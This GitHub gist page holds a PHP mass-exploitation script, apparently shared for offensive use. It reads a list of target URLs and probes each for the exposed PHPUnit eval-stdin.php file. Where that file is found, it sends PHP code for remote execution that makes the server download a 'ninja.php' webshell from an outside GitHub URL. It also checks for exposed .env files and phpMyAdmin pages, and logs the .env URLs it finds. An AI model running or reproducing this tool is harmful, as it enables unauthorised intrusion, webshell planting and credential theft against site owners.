Skip to content

Instantly share code, notes, and snippets.

@zelsaddr

zelsaddr/laravelEx.php

Last active January 17, 2020 08:14
Show Gist options
  • Save zelsaddr/1efd54b5957dd203fb0254b7925c7e47 to your computer and use it in GitHub Desktop.
Save zelsaddr/1efd54b5957dd203fb0254b7925c7e47 to your computer and use it in GitHub Desktop.
Download ZIP
laravel eval stdin exploiter & env checker
Raw
laravelEx.php
<?php
error_reporting(0);
#LARAVEL EXPLOITER v1#
# BY FB/www.zeldin.go.id [ SECURITY GHOST ] #
define("SAVED_FILE", "envscanner".uniqid().".txt");
function test($site, $test = 1){
switch($test){
case 1 :
$postFields = "<?php echo('vuln'); ?>";
break;
case 2 :
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>";
break;
case 3 :
$postFields = "<?php file_put_contents('ninja.php', 'https://raw.githubusercontent.com/rintod/ninja/master/ninja.php'); ?>";
break;
default :
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>";
break;
}
$ch = curl_init();
$options = array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postFields,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_CONNECTTIMEOUT => 7,
CURLOPT_TIMEOUT => 7
);
curl_setopt_array($ch, $options);
return curl_exec($ch);
}
function get_http_response_code($domain1) {
$headers = get_headers($domain1);
return substr($headers[0], 9, 3);
}
function env($site){
preg_match('#(.*)vendor#si', $site, $url);
$check = get_http_response_code($url[1].".env");
return $check;
}
function uri($site){
preg_match('#(.*?)vendor#si', $site, $url);
return $url;
}
echo "# LIST : "; $flist = trim(fgets(STDIN));
if(!is_file($flist) || !file_exists($flist)){
die("No url file list\n");
}
$list = explode("\r\n", file_get_contents($flist));
foreach($list as $key => $target){
if(strlen($target) > 0 && strpos($target, 'vendor')){
$site = explode('/', $target)[2];
echo ">>>>>>>>>> START [ ".$key." ] EXPLOITER <<<<<<<<<\n";
echo "\t>> TARGET : ".$site."\n";
echo "\t>> SCANNING TARGET HAS AN RCE FILE OR NOT : ";
if(get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php") == 200){
echo "{!} RCE FILE AVAILABLE {!}\n";
echo "\t{!} START TESTING {!} \n";
sleep(2);
echo "\t>> TESTING VULN MESSAGE\n";
echo "\t>> RESULT : ";
if(test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 1) == "vuln"){
echo "VULN\n";
echo "\t>> SITE SHELL CHECK : ".uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php"."\n";
echo "\t>> TESTING WITH COPY EXTENSION WEBSHELL & CHECK\n";
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 2);
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n";
echo "\t>> TESTING WITH FILE PUT CONTENTS FUNCTION & CHECK\n";
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 3);
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n";
}else{
echo "NOT VULN\n";
}
}else{
echo "{~} RCE FILE NOT AVAILABLE {~}\n";
}
echo "\t>> CHECK HAS A ENV FILE OR NOT\n";
preg_match('#(.*)vendor#si', $target, $url);
echo "\t>> ENV CHECK URL : ".$url[1].".env\n";
echo "\t>> RESULT : ";
if(env($target) == "200"){
file_put_contents(SAVED_FILE, $url[1].".env\n", FILE_APPEND);
echo $site." [ HAS ENV ]\n";
echo "\t>> CHECK PHPMYADMIN PAGE : ";
echo get_http_response_code("http://".$site."/phpmyadmin/") == "200" ? "HAS PHPMYADMIN PAGE\n" : "PHPMYADMIN PAGE NOT FOUND\n";
}else{
echo $site." [ ENV NOT FOUND ]\n";
}
echo ">>>>>>>>>>>>>>>>>>> DONE <<<<<<<<<<<<<<<<<<<\n\n";
}else{
$site = explode('/', $target)[2];
echo ">> SKIPPING SITE : ".$site." ~ REASON : VENDOR URL NOT DETECTED.\n";
}
sleep(1);
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment